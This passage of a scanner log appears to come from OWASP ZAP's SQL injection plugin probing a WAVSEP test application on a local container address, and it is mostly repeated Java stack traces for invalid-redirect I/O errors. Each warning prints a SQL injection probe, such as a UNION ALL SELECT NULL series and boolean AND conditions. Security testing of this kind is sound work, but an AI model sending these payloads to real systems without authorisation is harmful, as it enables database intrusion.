org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682395 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682395 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9682401 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 6242=1550 AND (2099=2099] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 6242=1550 AND (2099=2099 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682401 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 7813=7813 AND (8981=8981] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7813=7813 AND (8981=8981 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682403 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 6242=1550 AND (2099=2099] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 6242=1550 AND (2099=2099 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682404 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 4781=8042] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4781=8042 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682406 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3568=3568] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3568=3568 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682407 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 4781=8042] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4781=8042 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682408 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 5650=5432 AND ('RGjt'='RGjt] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5650=5432 AND ('RGjt'='RGjt at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682409 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 6890=6890 AND ('ADpn'='ADpn] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6890=6890 AND ('ADpn'='ADpn at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682409 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 5650=5432 AND ('RGjt'='RGjt] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5650=5432 AND ('RGjt'='RGjt at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682410 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 5236=3489 AND 'BIYY'='BIYY] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5236=3489 AND 'BIYY'='BIYY at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682411 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 2751=2751 AND 'qasZ'='qasZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2751=2751 AND 'qasZ'='qasZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682412 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 5236=3489 AND 'BIYY'='BIYY] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5236=3489 AND 'BIYY'='BIYY at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682413 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 3950=6933 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 3950=6933 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682413 